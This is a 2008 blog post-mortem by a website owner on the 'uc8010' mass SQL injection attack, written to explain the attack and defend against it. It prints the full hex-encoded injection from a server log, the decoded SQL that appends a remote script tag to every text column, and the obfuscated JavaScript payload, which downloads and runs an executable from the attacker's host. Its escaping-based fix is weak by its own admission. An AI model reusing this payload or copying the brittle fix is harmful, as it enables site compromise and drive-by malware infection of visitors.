uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours thanks to several clever guys,  the whole thing was completely deconstructed with hard facts and code. Thanks to all those that contributed their information, it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

How it was done

SQL injection through via unescaped querystring variables.

We think they looked and tried several query string variables (like id, by, filter, etc)

Here is the code they injected (gotten from someone’s logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0×4400450043004C0041005200450020004000540020007
600610072006300680061007200280032003500350029002
C00400043002000760061007200630068006100720028003
20035003500290020004400450043004C004100520045002
0005400610062006C0065005F0043007500720073006F007
200200043005500520053004F005200200046004F0052002
000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006
F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006
E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E0064002
00061002E00780074007900700065003D002700750027002
00061006E0064002000280062002E0078007400790070006
5003D003900390020006F007200200062002E00780074007
900700065003D003300350020006F007200200062002E007
80074007900700065003D0032003300310020006F0072002
00062002E00780074007900700065003D003100360037002
90020004F00500045004E0020005400610062006C0065005
F0043007500720073006F007200200046004500540043004
80020004E004500580054002000460052004F004D0020002
0005400610062006C0065005F0043007500720073006F007
200200049004E0054004F002000400054002C00400043002
0005700480049004C0045002800400040004600450054004
30048005F005300540041005400550053003D00300029002
00042004500470049004E002000650078006500630028002
70075007000640061007400650020005B0027002B0040005
4002B0027005D00200073006500740020005B0027002B004
00043002B0027005D003D0072007400720069006D0028006
3006F006E007600650072007400280076006100720063006
800610072002C005B0027002B00400043002B0027005D002
90029002B00270027003C007300630072006900700074002
0007300720063003D0068007400740070003A002F002F006
3002E007500630038003000310030002E0063006F006D002
F0030002E006A0073003E003C002F0073006300720069007
00074003E002700270027002900460045005400430048002
0004E004500580054002000460052004F004D00200020005
400610062006C0065005F0043007500720073006F0072002
00049004E0054004F002000400054002C004000430020004
5004E004400200043004C004F00530045002000540061006
2006C0065005F0043007500720073006F007200200044004
50041004C004C004F0043004100540045002000540061006
2006C0065005F0043007500720073006F007200%20AS%20
NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;
DECLARE_@S_NVARCHAR4000);
SET_@S=CAST0x4400450043004C004100520045002000400
054002000760061007200630068006100720028003200350
0350029002C00400043002000'.
202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

The actual SQL injected looks like this (decoded this looks like

DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from
 sysobjects a,
 syscolumns b
 where
 a.id=b.id
 and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
DEALLOCATE Table_Cursor

How to find it exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

string safer_id = Request.QueryString["id"].Replace("'","''");

By the looks of it ‘CAST(‘ and ‘EXEC(‘ look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can’t really hurt.

string safer = Request.QueryString["id"].Replace("'","''");
if (safer .Length > 128) safer = safer.Substring(0,127);
safer = safer.Replace("CAST(","NOCAST](");
safer = safer.Replace("'EXEC(","NOEXEC](");

These are not fool proof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?.uc8010.com/0.js></script>

The code for 0.js looks like:

function setCookie(name,value)
{
var Days = 1;var exp = new Date();
exp.setTime(exp.getTime() + Days*30*60*1000);
//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("");
document.writeln("");
setCookie("Lin","ok");
return null;
}
}
getCookie("Lin")eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

It is malicious: the point

According to websmithrob this code is malicious and hidden in there is an attack known as the EXPL_REALPLAY.H
or RealPlayer Exploit (read more about it here)

Microsoft issue security advisory

Advertisements

uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similiar tricks.